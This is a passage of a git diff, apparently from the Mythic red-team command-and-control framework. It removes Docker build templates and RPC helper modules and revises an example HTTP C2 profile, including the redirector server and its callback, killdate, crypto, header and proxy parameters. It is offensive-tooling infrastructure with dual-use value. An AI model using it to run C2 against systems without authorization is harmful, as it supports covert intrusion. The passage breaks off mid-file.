xgo image..." -docker build -f "xgolang_dockerfile" --rm -t "xgolang_payload" . - -docker image prune -f -echo "Building golden leviathan image..." -docker build -f "leviathan_dockerfile" --rm -t "leviathan_payload" . \ No newline at end of file diff --git a/Docker_Templates/Docker_Payload_Type_base_files/csharp_dockerfile b/Docker_Templates/Docker_Payload_Type_base_files/csharp_dockerfile deleted file mode 100644 index b48b6b59c..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/csharp_dockerfile +++ /dev/null @@ -1,19 +0,0 @@ -from mono:latest -RUN apt-get update -RUN apt-get install software-properties-common apt-utils make build-essential libssl-dev zlib1g-dev libbz2-dev \ -libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev libncursesw5-dev \ -xz-utils tk-dev libffi-dev liblzma-dev -y -RUN apt-get update -RUN wget https://www.python.org/ftp/python/3.8.6/Python-3.8.6.tgz -RUN tar xvf Python-3.8.6.tgz -RUN Python-3.8.6/configure --with-ensurepip=install -RUN make -j8 -RUN make altinstall -RUN python3.8 -m pip install aio_pika - -RUN mkdir -p "/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35" -COPY ["System.Management.Automation.dll", "/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.Management.Automation.dll"] -RUN mkdir -p "/Windows/Microsoft.NET/assembly/GAC_MSIL/System.Management.Automation/v4.0_3.0.0.0__31bf3856ad364e35" -COPY ["System.Management.Automation.dll-v4", "/Windows/Microsoft.NET/assembly/GAC_MSIL/System.Management.Automation/v4.0_3.0.0.0__31bf3856ad364e35/System.Management.Automation.dll"] - -ENTRYPOINT ["/Mythic/mythic/payload_service.sh"] \ No newline at end of file diff --git a/Docker_Templates/Docker_Payload_Type_base_files/fetch.sh b/Docker_Templates/Docker_Payload_Type_base_files/fetch.sh deleted file mode 100644 index 1a88c0216..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/fetch.sh +++ /dev/null @@ -1,27 +0,0 @@ -#!/bin/bash -# -# Contains a simple fetcher to download a file from a remote URL and verify its -# SHA1 or SHA256 checksum (selected based on provided length). -# -# Usage: fetch.sh -set -e - -# Skip the download if no operands specified -if [ "$1" == "" -o "$2" == "" ]; then - echo "Fetch operands missing, skipping..." - exit -fi - -# Pull the file from the remote URL -file=`basename $1` -echo "Downloading $1..." -wget -q $1 - -# Generate a desired checksum report and check against it -echo "$2 $file" > $file.sum -if [ "${#2}" == "40" ]; then - sha1sum -c $file.sum -else - sha256sum -c $file.sum -fi -rm $file.sum \ No newline at end of file diff --git a/Docker_Templates/Docker_Payload_Type_base_files/leviathan_dockerfile b/Docker_Templates/Docker_Payload_Type_base_files/leviathan_dockerfile deleted file mode 100644 index d74607620..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/leviathan_dockerfile +++ /dev/null @@ -1,10 +0,0 @@ -From python:3.8-buster -RUN pip install aio_pika - -RUN apt-get update -RUN apt-get install software-properties-common apt-utils -y -RUN apt-get -y install git -RUN git clone https://github.com/xorrior/CRX3-Creator.git /CRX3-Creator -RUN cd /CRX3-Creator; pip install -r requirements.txt; - -ENTRYPOINT ["/Mythic/mythic/payload_service.sh"] diff --git a/Docker_Templates/Docker_Payload_Type_base_files/patch.tar.xz b/Docker_Templates/Docker_Payload_Type_base_files/patch.tar.xz deleted file mode 100644 index bff5da4ea..000000000 Binary files a/Docker_Templates/Docker_Payload_Type_base_files/patch.tar.xz and /dev/null differ diff --git a/Docker_Templates/Docker_Payload_Type_base_files/payload_service.sh b/Docker_Templates/Docker_Payload_Type_base_files/payload_service.sh deleted file mode 100755 index 00627848a..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/payload_service.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -cd /Mythic/mythic - -export PYTHONPATH=/Mythic:/Mythic/mythic - -python3.8 mythic_service.py diff --git a/Docker_Templates/Docker_Payload_Type_base_files/python38_dockerfile b/Docker_Templates/Docker_Payload_Type_base_files/python38_dockerfile deleted file mode 100644 index 37212bdb3..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/python38_dockerfile +++ /dev/null @@ -1,4 +0,0 @@ -From python:3.8-buster -RUN pip install aio_pika - -ENTRYPOINT ["/Mythic/mythic/payload_service.sh"] diff --git a/Docker_Templates/Docker_Payload_Type_base_files/xgolang_dockerfile b/Docker_Templates/Docker_Payload_Type_base_files/xgolang_dockerfile deleted file mode 100644 index 7b157fcc9..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/xgolang_dockerfile +++ /dev/null @@ -1,98 +0,0 @@ -# Go cross compiler (xgo): Base cross-compilation layer -# Copyright (c) 2014 Péter Szilágyi. All rights reserved. -# -# Released under the MIT license. -# pulled and modified from https://github.com/karalabe/xgo/blob/master/docker/go-1.13.4/Dockerfile - -FROM ubuntu:18.04 -# Mark the image as xgo enabled to support xgo-in-xgo -ENV XGO_IN_XGO 1 - -# Configure the Go environment, since it's not going to change -ENV PATH /usr/local/go/bin:$PATH -ENV GOPATH /go - - -# Inject the remote file fetcher and checksum verifier -ADD fetch.sh /fetch.sh -ENV FETCH /fetch.sh -RUN chmod +x $FETCH - - -# Make sure apt-get is up to date and dependent packages are installed -RUN \ - apt-get update && \ - apt-get install -y automake autogen build-essential ca-certificates cmake \ - gcc-5-aarch64-linux-gnu g++-5-aarch64-linux-gnu libc6-dev-arm64-cross \ - gcc-5-multilib g++-5-multilib clang llvm-dev \ - libtool libxml2-dev uuid-dev libssl-dev swig openjdk-8-jdk pkg-config patch \ - make xz-utils cpio wget zip unzip p7zip git mercurial bzr texinfo help2man \ - --no-install-recommends - -RUN \ - apt-get install -y python3 python3-pip - -RUN pip3 install aio_pika - -# Fix any stock package issues -RUN ln -s /usr/include/asm-generic /usr/include/asm - -########################## -# Darwin Toolchain build # -########################## - -# Configure the container for OSX cross compilation -ENV OSX_SDK MacOSX10.11.sdk -ENV OSX_SDK_PATH https://s3.dockerproject.org/darwin/v2/$OSX_SDK.tar.xz - -# Make libxar known to the ld64 and cctools build -ENV LD_LIBRARY_PATH=/osxcross/target/lib - -# Download the osx sdk and build the osx toolchain -# We download the osx sdk, patch it and pack it again to be able to throw the patched version at osxcross -RUN \ - $FETCH $OSX_SDK_PATH dd228a335194e3392f1904ce49aff1b1da26ca62 && \ - tar -xf `basename $OSX_SDK_PATH` && rm -f `basename $OSX_SDK_PATH` -ADD patch.tar.xz $OSX_SDK/usr/include/c++ -RUN tar -cf - $OSX_SDK/ | xz -c - > $OSX_SDK.tar.xz && rm -rf $OSX_SDK - -# Actually build the toolchain -RUN \ - git clone https://github.com/tpoechtrager/osxcross.git && \ - cd osxcross && git checkout 88cb6e8d0d7675cae7c8a2d66c11f58237101df0 && cd ../ && \ - mv $OSX_SDK.tar.xz /osxcross/tarballs/ && \ - OSX_VERSION_MIN=10.10 UNATTENDED=1 LD_LIBRARY_PATH=/osxcross/target/lib /osxcross/build.sh -ENV PATH /osxcross/target/bin:$PATH - -# Inject the new Go root distribution downloader and bootstrapper -ADD bootstrap_pure.sh /bootstrap_pure.sh -ENV BOOTSTRAP_PURE /bootstrap_pure.sh -RUN chmod +x $BOOTSTRAP_PURE - -# Inject the container entry point, the build script -ADD build.sh /build.sh -ENV BUILD /build.sh -RUN chmod +x $BUILD - -ENV GO_VERSION 11304 -# Make libxar known to the ld64 and cctools build -ENV LD_LIBRARY_PATH=/osxcross/target/lib - -RUN \ - export ROOT_DIST=https://storage.googleapis.com/golang/go1.13.4.linux-amd64.tar.gz && \ - export ROOT_DIST_SHA=692d17071736f74be04a72a06dab9cac1cd759377bd85316e52b2227604c004c && \ - \ - $BOOTSTRAP_PURE - -ENV GOROOT /usr/local/go -ENV GOPATH /go/src:/go/src/poseidon - -RUN go get github.com/google/shlex \ - github.com/kbinani/screenshot \ - github.com/tmc/scp \ - github.com/xorrior/keyctl \ - golang.org/x/crypto/ssh \ - golang.org/x/sync/semaphore \ - github.com/gorilla/websocket - -ENTRYPOINT ["/Mythic/mythic/payload_service.sh"] \ No newline at end of file diff --git a/Example_C2_Profile/Dockerfile b/Example_C2_Profile/Dockerfile index fd1da732e..38cbe3983 100755 --- a/Example_C2_Profile/Dockerfile +++ b/Example_C2_Profile/Dockerfile @@ -1 +1 @@ -From itsafeaturemythic/python38_sanic_c2profile:0.0.1 \ No newline at end of file +FROM itsafeaturemythic/python38_sanic_c2profile:0.0.4 diff --git a/C2_Profiles/HTTP/mythic/__init__.py b/Example_C2_Profile/__init__.py similarity index 100% rename from C2_Profiles/HTTP/mythic/__init__.py rename to Example_C2_Profile/__init__.py diff --git a/Example_C2_Profile/c2_code/config.json b/Example_C2_Profile/c2_code/config.json index af7e597b5..1060cfdfe 100755 --- a/Example_C2_Profile/c2_code/config.json +++ b/Example_C2_Profile/c2_code/config.json @@ -11,7 +11,7 @@ "port": 80, "key_path": "", "cert_path": "", - "debug": true + "debug": false } ] -} +} \ No newline at end of file diff --git a/Example_C2_Profile/c2_code/server b/Example_C2_Profile/c2_code/server index 037c209d8..913b89d4c 100755 --- a/Example_C2_Profile/c2_code/server +++ b/Example_C2_Profile/c2_code/server @@ -18,7 +18,11 @@ async def print_flush(message): sys.stdout.flush() -async def server_error_handler(request, exception): +def server_error_handler(request, exception): + if request is None: + print("Invalid HTTP Method - Likely HTTPS trying to talk to HTTP") + sys.stdout.flush() + return html("Error: Failed to process request", status=500, headers={}) return html("Error: Requested URL {} not found".format(request.url), status=404, headers=config[request.app.name]['headers']) @@ -33,22 +37,28 @@ async def agent_message(request, **kwargs): if request.method == "POST": # manipulate the request if needed #await MythicCallbackRPC().add_event_message(message="got a POST message") - response = requests.post(config['mythic_address'], data=request.body, verify=False, cookies=request.cookies, headers=request.headers) + response = requests.post(config['mythic_address'], data=request.body, verify=False, cookies=request.cookies, headers={"Mythic": "http", **request.headers}) else: # manipulate the request if needed #await MythicCallbackRPC().add_event_message(message="got a GET message") - response = requests.get(config['mythic_address'] + "?{}".format(request.query_string), verify=False, data=request.body, cookies=request.cookies, headers=request.headers) + #msg = await MythicCallbackRPC().encrypt_bytes(with_uuid=True, data="my message".encode(), uuid="eaf10700-cb30-402d-b101-8e35d67cdb41") + #await MythicCallbackRPC().add_event_message(message=msg.response) + response = requests.get(config['mythic_address'] + "?{}".format(request.query_string), verify=False, data=request.body, cookies=request.cookies, headers={"Mythic": "http", **request.headers}) return raw(response.content, headers=config[request.app.name]['headers'], status=response.status_code) except Exception as e: + if request is None: + await print_flush("Invalid HTTP Method - Likely HTTPS trying to talk to HTTP") + return server_error_handler(request, e) if config[request.app.name]['debug']: await print_flush("error in agent_message: {}".format(str(e))) - return await no_match(request, NotFound) + return server_error_handler(request, e) + if __name__ == "__main__": sys.path.append("/Mythic/mythic") - from C2ProfileBase import * - from MythicCallbackRPC import * + from mythic_c2_container.C2ProfileBase import * + from mythic_c2_container.MythicCallbackRPC import * config_file = open("config.json", 'rb') main_config = json.loads(config_file.read().decode('utf-8')) print("Opening config and starting instances...") diff --git a/Example_C2_Profile/mythic/C2ProfileBase.py b/Example_C2_Profile/mythic/C2ProfileBase.py deleted file mode 100644 index 313cdf49f..000000000 --- a/Example_C2_Profile/mythic/C2ProfileBase.py +++ /dev/null @@ -1,130 +0,0 @@ -from enum import Enum -from abc import abstractmethod -import json - - -class ParameterType(Enum): - String = "String" - ChooseOne = "ChooseOne" - Array = "Array" - Date = "Date" - Dictionary = "Dictionary" - - -class C2ProfileParameter: - def __init__( - self, - name: str, - description: str, - default_value: str = "", - randomize: bool = False, - format_string: str = "", - parameter_type: ParameterType = ParameterType.String, - required: bool = True, - verifier_regex: str = "", - choices: [str] = None, - ): - self.name = name - self.description = description - self.randomize = randomize - self.format_string = format_string - self.parameter_type = parameter_type - self.required = required - self.verifier_regex = verifier_regex - self.choices = choices - self.default_value = "" - if self.parameter_type == ParameterType.ChooseOne and choices is not None: - self.default_value = "\n".join(choices) - else: - self.default_value = default_value - - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "default_value": self.default_value if self.parameter_type not in [ParameterType.Array, ParameterType.Dictionary] else json.dumps(self.default_value), - "randomize": self.randomize, - "format_string": self.format_string, - "required": self.required, - "parameter_type": self.parameter_type.value, - "verifier_regex": self.verifier_regex, - } - - -class C2Profile: - @property - @abstractmethod - def name(self): - pass - - @property - @abstractmethod - def description(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def is_p2p(self): - pass - - @property - @abstractmethod - def is_server_routed(self): - pass - - @property - @abstractmethod - def mythic_encrypts(self): - pass - - @property - @abstractmethod - def parameters(self): - pass - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "author": self.author, - "mythic_encrypts": self.mythic_encrypts, - "is_p2p": self.is_p2p, - "is_server_routed": self.is_server_routed, - "params": [x.to_json() for x in self.parameters], - } - - -class RPCStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, status: RPCStatus = None, response: str = None): - self.status = status - self.response = response - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - def to_json(self): - return {"status": self.status.value, "response": self.response} diff --git a/Example_C2_Profile/mythic/MythicBaseRPC.py b/Example_C2_Profile/mythic/MythicBaseRPC.py deleted file mode 100644 index e190491ac..000000000 --- a/Example_C2_Profile/mythic/MythicBaseRPC.py +++ /dev/null @@ -1,99 +0,0 @@ -from aio_pika import connect_robust, IncomingMessage, Message -import asyncio -import uuid -import json -from enum import Enum - - -class MythicStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, resp: dict): - self._raw_resp = resp - if resp["status"] == "success": - self.status = MythicStatus.Success - self.response = resp["response"] if "response" in resp else "" - self.error_message = None - else: - self.status = MythicStatus.Error - self.error_message = resp["error"] - self.response = None - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def error_message(self): - return self._error_message - - @error_message.setter - def error_message(self, error_message): - self._error_message = error_message - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - -class MythicBaseRPC: - def __init__(self): - self.connection = None - self.channel = None - self.callback_queue = None - self.futures = {} - self.loop = asyncio.get_event_loop() - - async def connect(self): - config_file = open("/Mythic/mythic/rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - self.connection = await connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - self.channel = await self.connection.channel() - self.callback_queue = await self.channel.declare_queue(exclusive=True) - await self.callback_queue.consume(self.on_response) - - return self - - def on_response(self, message: IncomingMessage): - future = self.futures.pop(message.correlation_id) - future.set_result(message.body) - - async def call(self, n, receiver: str = None) -> RPCResponse: - if self.connection is None: - await self.connect() - correlation_id = str(uuid.uuid4()) - future = self.loop.create_future() - - self.futures[correlation_id] = future - if receiver is None: - router = "c2rpc_queue" - else: - router = "{}_rpc_queue".format(receiver) - await self.channel.default_exchange.publish( - Message( - json.dumps(n).encode(), - content_type="application/json", - correlation_id=correlation_id, - reply_to=self.callback_queue.name, - ), - routing_key=router, - ) - - return RPCResponse(json.loads(await future)) diff --git a/Example_C2_Profile/mythic/MythicCallbackRPC.py b/Example_C2_Profile/mythic/MythicCallbackRPC.py deleted file mode 100644 index 002a8038c..000000000 --- a/Example_C2_Profile/mythic/MythicCallbackRPC.py +++ /dev/null @@ -1,124 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicCallbackRPC(MythicBaseRPC): - # returns dictionary of `{"raw": raw_tasking, "encrypted": base64(uuid+encrypted_tasking)}` - async def get_tasking( - self, uuid: str, tasking_size: int = 1 - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_tasking", - "uuid": uuid, - "tasking_size": tasking_size, - } - ) - return MythicRPCResponse(resp) - - async def add_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "add_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def remove_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "remove_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def get_callback_info(self, uuid: str) -> MythicRPCResponse: - resp = await self.call({"action": "get_callback_info", "uuid": uuid}) - return MythicRPCResponse(resp) - - async def get_encryption_data(self, uuid: str, profile: str) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_encryption_data", - "uuid": uuid, - "c2_profile": profile, - } - ) - return MythicRPCResponse(resp) - - async def update_callback_info(self, uuid: str, info: dict) -> MythicRPCResponse: - resp = await self.call( - {"action": "update_callback_info", "uuid": uuid, "data": info} - ) - return MythicRPCResponse(resp) - - async def add_event_message( - self, message: str, level: str = "info" - ) -> MythicRPCResponse: - resp = await self.call( - {"action": "add_event_message", "level": level, "message": message} - ) - return MythicRPCResponse(resp) - - async def encrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "encrypt_bytes", - "data": base64.b64encode(data).decode(), - "uuid": uuid, - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) - - async def decrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "decrypt_bytes", - "uuid": uuid, - "data": base64.b64encode(data).decode(), - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) diff --git a/Example_C2_Profile/mythic/c2_functions/C2_RPC_functions.py b/Example_C2_Profile/mythic/c2_functions/C2_RPC_functions.py index 6332e7fc2..1a4aa6b24 100644 --- a/Example_C2_Profile/mythic/c2_functions/C2_RPC_functions.py +++ b/Example_C2_Profile/mythic/c2_functions/C2_RPC_functions.py @@ -1,5 +1,5 @@ -from C2ProfileBase import * -import MythicCallbackRPC +from mythic_c2_container.C2ProfileBase import * +import sys # request is a dictionary: {"action": func_name, "message": "the input", "task_id": task id num} # must return an RPCResponse() object and set .status to an instance of RPCStatus and response to str of message @@ -8,4 +8,20 @@ async def test(request): response.status = RPCStatus.Success response.response = "hello" #resp = await MythicCallbackRPC.MythicCallbackRPC().add_event_message(message="got a POST message") - return response \ No newline at end of file + return response + + +# The opsec function is called when a payload is created as a check to see if the parameters supplied are good +# The input for "request" is a dictionary of: +# { +# "action": "opsec", +# "parameters": { +# "param_name": "param_value", +# "param_name2: "param_value2", +# } +# } +# This function should return one of two things: +# For success: {"status": "success", "message": "your success message here" } +# For error: {"status": "error", "error": "your error message here" } +async def opsec(request): + return {"status": "success", "message": "No OPSEC Check Performed"} \ No newline at end of file diff --git a/Example_C2_Profile/mythic/c2_functions/HTTP.py b/Example_C2_Profile/mythic/c2_functions/HTTP.py index eec1d8f51..38816cf96 100644 --- a/Example_C2_Profile/mythic/c2_functions/HTTP.py +++ b/Example_C2_Profile/mythic/c2_functions/HTTP.py @@ -1,13 +1,12 @@ -from C2ProfileBase import * +from mythic_c2_container.C2ProfileBase import * class HTTP(C2Profile): - name = "HTTP" + name = "http" description = "Uses HTTP(S) connections with a simple query parameter or basic POST messages. For more configuration options use dynamicHTTP." author = "@its_a_feature_" is_p2p = False is_server_routed = False - mythic_encrypts = True parameters = [ C2ProfileParameter( name="callback_port", @@ -19,13 +18,15 @@ class HTTP(C2Profile): C2ProfileParameter( name="killdate", description="Kill Date", - default_value="yyyy-mm-dd", + parameter_type=ParameterType.Date, + default_value=365, required=False, ), C2ProfileParameter( name="encrypted_exchange_check", description="Perform Key Exchange", choices=["T", "F"], + required=False, parameter_type=ParameterType.ChooseOne, ), C2ProfileParameter( @@ -36,22 +37,39 @@ class HTTP(C2Profile): required=False, ), C2ProfileParameter( - name="domain_front", - description="Host header value for domain fronting", - default_value="", - required=False, - ), - C2ProfileParameter( - name="USER_AGENT", - description="User Agent", - default_value="Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", + name="headers", + description="HTTP Headers", required=False, + parameter_type=ParameterType.Dictionary, + default_value=[ + { + "name": "User-Agent", + "max": 1, + "default_value": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", + "default_show": True, + }, + { + "name": "Host", + "max": 1, + "default_value": "", + "default_show": False, + }, + { + "name": "*", + "max": -1, + "default_value": "", + "default_show": False + } + ] ), C2ProfileParameter( name="AESPSK", - description="Base64 of a 32B AES Key", - default_value="", + description="Crypto type", + default_value="aes256_hmac", + parameter_type=ParameterType.ChooseOne, + choices=["aes256_hmac", "none"], required=False, + crypto_type=True ), C2ProfileParameter( name="callback_host", @@ -60,84 +78,47 @@ class HTTP(C2Profile): verifier_regex="^(http|https):\/\/[a-zA-Z0-9]+", ), C2ProfileParameter( - name="callback_interval", - description="Callback Interval in seconds", - default_value="10", - verifier_regex="^[0-9]+$", - required=False, - ), - ] -""" -C2ProfileParameter( - name="callback_port", - description="Callback Port", - default_value="80", - verifier_regex="^[0-9]+$", + name="get_uri", + description="GET request URI (don't include leading /)", + default_value="index", required=False, ), C2ProfileParameter( - name="encrypted_exchange_check", - description="Perform Key Exchange", - choices=["T", "F"], - parameter_type=ParameterType.ChooseOne, + name="post_uri", + description="POST request URI (don't include leading /)", + default_value="data", + required=False, ), C2ProfileParameter( - name="callback_jitter", - description="Callback Jitter in percent", - default_value="23", - verifier_regex="^[0-9]+$", + name="query_path_name", + description="Name of the query parameter for GET requests", + default_value="q", required=False, + verifier_regex="^[^\/]", ), C2ProfileParameter( - name="domain_front", - description="Host header value for domain fronting", + name="proxy_host", + description="Proxy Host", default_value="", required=False, + verifier_regex="^$|^(http|https):\/\/[a-zA-Z0-9]+", ), C2ProfileParameter( - name="callback_host", - description="Callback Host", - default_value="https://domain.com", - parameter_type=ParameterType.Array, - verifier_regex="^(http|https):\/\/[a-zA-Z0-9]+", - ), - - C2ProfileParameter( - name="killdate", - description="Kill Date", - parameter_type=ParameterType.Date, - default_value=365, + name="proxy_port", + description="Proxy Port", + default_value="", + verifier_regex="^$|^[0-9]+$", required=False, ), C2ProfileParameter( - name="USER_AGENT", - description="User Agent", + name="proxy_user", + description="Proxy Username", + default_value="", required=False, - parameter_type=ParameterType.Dictionary, - default_value=[ - { - "name": "USER_AGENT", - "max": 1, - "default_value": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", - "default_show": True, - }, - { - "name": "host", - "max": 2, - "default_value": "", - "default_show": False, - }, - { - "name": "*", - "max": -1, - "default_value": "", - "default_show": False - } - ] ), C2ProfileParameter( - name="AESPSK", - description="Base64 of a 32B AES Key", + name="proxy_pass", + description="Proxy Password", default_value="", required=False, ), @@ -147,4 +128,5 @@ class HTTP(C2Profile): default_value="10", verifier_regex="^[0-9]+$", required=False, - ),""" \ No newline at end of file + ), + ] diff --git a/Example_C2_Profile/mythic/mythic_service.py b/Example_C2_Profile/mythic/mythic_service.py index dde56b77c..415d37536 100755 --- a/Example_C2_Profile/mythic/mythic_service.py +++ b/Example_C2_Profile/mythic/mythic_service.py @@ -1,410 +1,3 @@ #!/usr/bin/env python3 -import aio_pika -import os -import time -import sys -import subprocess -import _thread -import base64 -import json -import socket -import asyncio -import pathlib -import traceback -from C2ProfileBase import * -from importlib import import_module, invalidate_caches -from functools import partial - -credentials = None -connection_params = None -running = False -process = None -thread = None -hostname = "" -output = "" -exchange = None -container_files_path = None - - -def deal_with_stdout(): - global process - global output - while True: - try: - for line in iter(process.stdout.readline, b""): - output += line.decode("utf-8") - except Exception as e: - print("Exiting thread due to: {}\n".format(str(e))) - sys.stdout.flush() - break - - -def import_all_c2_functions(): - import glob - - # Get file paths of all modules. - modules = glob.glob("c2_functions/*.py") - invalidate_caches() - for x in modules: - if not x.endswith("__init__.py") and x[-3:] == ".py": - module = import_module("c2_functions." + pathlib.Path(x).stem, package=None) - for el in dir(module): - if "__" not in el: - globals()[el] = getattr(module, el) - - -async def send_status(message="", routing_key=""): - global exchange - try: - message_body = aio_pika.Message(message.encode()) - await exchange.publish(message_body, routing_key=routing_key) - except Exception as e: - print("Exception in send_status: {}".format(str(e))) - sys.stdout.flush() - - -async def callback(message: aio_pika.IncomingMessage): - global running - global process - global output - global thread - global hostname - global container_files_path - with message.process(): - # messages of the form: c2.modify.PROFILE NAME.command - try: - command = message.routing_key.split(".")[3] - username = message.routing_key.split(".")[4] - server_path = container_files_path / "server" - # command = body.decode('utf-8') - if command == "start": - if not running: - # make sure to start the /Apfell/server in the background - os.chmod(server_path, mode=0o777) - output = "" - process = subprocess.Popen( - str(server_path), - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - cwd=str(container_files_path), - ) - thread = _thread.start_new_thread(deal_with_stdout, ()) - time.sleep(3) - process.poll() - if process.returncode is not None: - # this means something went wrong and the process is dead - running = False - await send_status( - message="Failed to start\nOutput: {}".format(output), - routing_key="c2.status.{}.stopped.start.{}".format( - hostname, username - ), - ) - output = "" - else: - running = True - await send_status( - message="Started with pid: {}...\nOutput: {}".format( - str(process.pid), output - ), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Already running...\nOutput: {}".format(output), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - elif command == "stop": - if running: - try: - process.kill() - process.communicate() - except Exception as e: - pass - try: - thread.exit() - except Exception as e: - pass - running = False - await send_status( - message="Process killed...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Process not running...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - # make sure to stop the /Apfell/server in the background - elif command == "status": - if running: - await send_status( - message="Output: {}".format(output), - routing_key="c2.status.{}.running.status.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="C2 is not running", - routing_key="c2.status.{}.stopped.status.{}".format( - hostname, username - ), - ) - elif command == "get_config": - try: - path = container_files_path / "config.json" - file_data = open(path, "rb").read() - except Exception as e: - file_data = b"File not found" - encoded_data = json.dumps( - { - "filename": "config.json", - "data": base64.b64encode(file_data).decode("utf-8"), - } - ) - await send_status( - message=encoded_data, - routing_key="c2.status.{}.{}.get_config.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "writefile": - try: - message = json.loads(message.body.decode("utf-8")) - file_path = container_files_path / message["file_path"] - file_path = file_path.resolve() - if container_files_path not in file_path.parents: - response = { - "status": "error", - "error": "trying to break out of path", - } - else: - file = open(file_path, "wb") - file.write(base64.b64decode(message["data"])) - file.close() - response = {"status": "success", "file": message["file_path"]} - except Exception as e: - response = {"status": "error", "error": str(e)} - await send_status( - message=json.dumps(response), - routing_key="c2.status.{}.{}.writefile.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "sync_classes": - try: - import_all_c2_functions() - # c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - else: - print("Unknown command: {}".format(command)) - sys.stdout.flush() - except Exception as e: - print("Failed overall message processing: " + str(e)) - sys.stdout.flush() - - -async def sync_classes(): - try: - import_all_c2_functions() - c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - - -async def rabbit_c2_rpc_callback( - exchange: aio_pika.Exchange, message: aio_pika.IncomingMessage -): - with message.process(): - request = json.loads(message.body.decode()) - if "action" in request: - response = await globals()[request["action"]](request) - response = json.dumps(response.to_json()).encode() - else: - response = json.dumps( - {"status": "error", "error": "Missing action"} - ).encode() - try: - await exchange.publish( - aio_pika.Message(body=response, correlation_id=message.correlation_id), - routing_key=message.reply_to, - ) - except Exception as e: - print( - "Exception trying to send message back to container for rpc! " + str(e) - ) - sys.stdout.flush() - - -async def connect_and_consume_rpc(): - connection = None - global hostname - while connection is None: - try: - connection = await aio_pika.connect_robust( - host="127.0.0.1", - login="mythic_user", - password="mythic_password", - virtualhost="mythic_vhost", - ) - channel = await connection.channel() - # get a random queue that only the apfell server will use to listen on to catch all heartbeats - queue = await channel.declare_queue("{}_rpc_queue".format(hostname)) - await channel.set_qos(prefetch_count=50) - try: - task = queue.consume( - partial(rabbit_c2_rpc_callback, channel.default_exchange) - ) - result = await asyncio.wait_for(task, None) - except Exception as e: - print("Exception in connect_and_consume .consume: {}".format(str(e))) - sys.stdout.flush() - except (ConnectionError, ConnectionRefusedError) as c: - print("Connection to rabbitmq failed, trying again...") - sys.stdout.flush() - except Exception as e: - print("Exception in connect_and_consume_rpc connect: {}".format(str(e))) - # print("Exception in connect_and_consume 